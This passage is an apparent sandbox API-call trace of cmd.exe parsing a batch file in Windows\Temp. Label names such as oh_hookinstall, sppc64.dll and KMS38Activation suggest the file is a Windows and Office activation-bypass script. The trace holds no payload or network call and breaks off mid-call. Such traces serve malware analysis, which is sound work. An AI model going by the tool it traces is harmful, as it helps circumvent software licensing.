(_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="startmsi") returned -20 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.267] _wcsicmp (_String1="_color2", _String2="oh_uninstall") returned -16 [0181.268] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.268] _wcsicmp (_String1="_color2", _String2="oh_reset") returned -16 [0181.268] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.268] _wcsicmp (_String1="_color2", _String2="oh_getpath") returned -16 [0181.268] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.268] _wcsicmp (_String1="_color2", _String2="oh_installkey") returned -16 [0181.269] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.269] _wcsicmp (_String1="_color2", _String2="oh_installlic") returned -16 [0181.269] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.269] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.269] _wcsicmp (_String1="_color2", _String2="oh_hookinstall") returned -16 [0181.270] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.270] _wcsicmp (_String1="_color2", _String2="oh_process") returned -16 [0181.270] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.270] _wcsicmp (_String1="_color2", _String2="oh_msiproducts") returned -16 [0181.270] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.270] _wcsicmp (_String1="_color2", _String2="oh_processmsi") returned -16 [0181.270] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.270] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.270] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.270] _wcsicmp (_String1="_color2", _String2="oh_actids") returned -16 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.271] _wcsicmp (_String1="_color2", _String2="ohookdata") returned -16 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="oh_extractdll") returned -16 [0181.272] _wcsicmp (_String1="_color2", _String2="hexedit") returned -9 [0181.272] _wcsicmp (_String1="_color2", _String2="hexedit") returned -9 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.272] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.273] _wcsicmp (_String1="_color2", _String2="sppc32.dll") returned -20 [0181.274] _wcsicmp (_String1="_color2", _String2="sppc32.dll") returned -20 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="sppc64.dll") returned -20 [0181.274] _wcsicmp (_String1="_color2", _String2="sppc64.dll") returned -20 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="KMS38Activation") returned -12 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.274] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.275] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.275] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.275] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.275] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.275] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.295] _close (_FileHandle=3) returned 0 [0181.295] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.295] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.295] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.295] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.296] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.296] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.296] SetConsoleInputExeNameW () returned 0x1 [0181.296] GetConsoleOutputCP () returned 0x1b5 [0181.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.297] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.297] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.297] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.297] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354127, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5674f [0181.297] GetProcessHeap () returned 0x19a8f1e0000 [0181.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0bb0) returned 1 [0181.298] GetProcessHeap () returned 0x19a8f1e0000 [0181.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.298] GetProcessHeap () returned 0x19a8f1e0000 [0181.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0181.298] GetProcessHeap () returned 0x19a8f1e0000 [0181.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0181.298] GetProcessHeap () returned 0x19a8f1e0000 [0181.299] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0181.299] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.299] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5674f [0181.299] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0181.299] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354129, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56751 [0181.299] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nll :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 2 [0181.299] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.299] GetFileType (hFile=0x9c) returned 0x1 [0181.299] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.299] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56751 [0181.299] GetProcessHeap () returned 0x19a8f1e0000 [0181.299] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.299] GetProcessHeap () returned 0x19a8f1e0000 [0181.300] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.300] _tell (_FileHandle=3) returned 354129 [0181.300] _close (_FileHandle=3) returned 0 [0181.301] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.301] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.301] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.301] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354129, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56751 [0181.301] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.301] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56751 [0181.301] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0181.301] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354148, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56764 [0181.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_NCS% EQU 1 (\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if %_NCS% EQU 1 (\r\nte% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 19 [0181.301] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.301] GetFileType (hFile=0x9c) returned 0x1 [0181.301] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.301] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56764 [0181.301] GetProcessHeap () returned 0x19a8f1e0000 [0181.301] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.301] GetProcessHeap () returned 0x19a8f1e0000 [0181.301] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0181.302] GetProcessHeap () returned 0x19a8f1e0000 [0181.302] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0181.302] GetEnvironmentVariableW (in: lpName="_NCS", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1 [0181.302] GetProcessHeap () returned 0x19a8f1e0000 [0181.302] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.302] GetProcessHeap () returned 0x19a8f1e0000 [0181.302] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0181.302] GetProcessHeap () returned 0x19a8f1e0000 [0181.303] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.303] _wcsicmp (_String1="if", _String2=")") returned 64 [0181.303] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0181.303] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0181.303] _wcsicmp (_String1="IF", _String2="if") returned 0 [0181.303] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0181.303] GetProcessHeap () returned 0x19a8f1e0000 [0181.303] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0181.303] GetProcessHeap () returned 0x19a8f1e0000 [0181.303] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec920 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecce0 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ecce0, Size=0x16) returned 0x19a8f1ec940 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec940) returned 0x16 [0181.304] _wcsicmp (_String1="1", _String2="/I") returned 2 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec6c0 [0181.304] _wcsicmp (_String1="ERRORLEVEL", _String2="1") returned 52 [0181.304] _wcsicmp (_String1="EXIST", _String2="1") returned 52 [0181.304] _wcsicmp (_String1="CMDEXTVERSION", _String2="1") returned 50 [0181.304] _wcsicmp (_String1="DEFINED", _String2="1") returned 51 [0181.304] _wcsicmp (_String1="NOT", _String2="1") returned 61 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecd60 [0181.304] _wcsicmp (_String1="EQU", _String2="EQU") returned 0 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec7a0 [0181.304] GetProcessHeap () returned 0x19a8f1e0000 [0181.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0181.304] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.304] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56764 [0181.305] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe590, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe590*=0x1fff, lpOverlapped=0x0) returned 1 [0181.305] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354187, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5678b [0181.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo %esc%[%~1%~2%esc%[%~3%~4%esc%[0m\r\n", cbMultiByte=39, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo %esc%[%~1%~2%esc%[%~3%~4%esc%[0m\r\nreen% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 39 [0181.305] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.305] GetFileType (hFile=0x9c) returned 0x1 [0181.305] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.305] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5678b [0181.305] GetProcessHeap () returned 0x19a8f1e0000 [0181.305] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.305] GetProcessHeap () returned 0x19a8f1e0000 [0181.305] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0181.306] GetProcessHeap () returned 0x19a8f1e0000 [0181.306] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecdc0 [0181.306] GetEnvironmentVariableW (in: lpName="esc", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1 [0181.306] GetProcessHeap () returned 0x19a8f1e0000 [0181.306] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecdc0) returned 1 [0181.306] GetProcessHeap () returned 0x19a8f1e0000 [0181.306] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb6e0 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb950 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb710 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb770 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecac0 [0181.307] GetEnvironmentVariableW (in: lpName="esc", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.307] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecac0) returned 1 [0181.307] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb980 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f201550 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x86) returned 0x19a8f1eaca0 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x84) returned 0x19a8f1ead30 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc60 [0181.308] GetEnvironmentVariableW (in: lpName="esc", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.308] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc60) returned 1 [0181.308] GetProcessHeap () returned 0x19a8f1e0000 [0181.309] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0181.309] GetProcessHeap () returned 0x19a8f1e0000 [0181.310] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.311] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0181.311] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0181.311] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0181.311] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0181.311] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0181.311] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0181.311] GetProcessHeap () returned 0x19a8f1e0000 [0181.311] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0181.312] GetProcessHeap () returned 0x19a8f1e0000 [0181.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f201460 [0181.312] GetProcessHeap () returned 0x19a8f1e0000 [0181.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc2) returned 0x19a8f1ea8b0 [0181.312] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.312] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5678b [0181.312] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe530, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe530*=0x1fff, lpOverlapped=0x0) returned 1 [0181.312] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354197, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56795 [0181.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=") else (\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=") else (\r\n[%~1%~2%esc%[%~3%~4%esc%[0m\r\nreen% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 10 [0181.312] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.312] GetFileType (hFile=0x9c) returned 0x1 [0181.312] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.312] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56795 [0181.312] GetProcessHeap () returned 0x19a8f1e0000 [0181.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.313] GetProcessHeap () returned 0x19a8f1e0000 [0181.313] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.314] _wcsicmp (_String1="ELSE", _String2="else") returned 0 [0181.314] GetProcessHeap () returned 0x19a8f1e0000 [0181.314] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f201250 [0181.314] GetProcessHeap () returned 0x19a8f1e0000 [0181.314] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0181.314] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.314] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56795 [0181.314] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe590, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe590*=0x1fff, lpOverlapped=0x0) returned 1 [0181.314] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x567b7 [0181.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :batcol %~1 \"%~2\" %~3 \"%~4\"\r\n", cbMultiByte=34, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="call :batcol %~1 \"%~2\" %~3 \"%~4\"\r\n[0m\r\nreen% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 34 [0181.314] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.314] GetFileType (hFile=0x9c) returned 0x1 [0181.314] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.314] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x567b7 [0181.314] GetProcessHeap () returned 0x19a8f1e0000 [0181.314] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f200f80 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f2012b0 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f2010a0 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f201190 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f200ec0 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f200ef0 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x86) returned 0x19a8f1ea980 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x84) returned 0x19a8f1e5ef0 [0181.315] GetProcessHeap () returned 0x19a8f1e0000 [0181.316] RtlFreeHeap 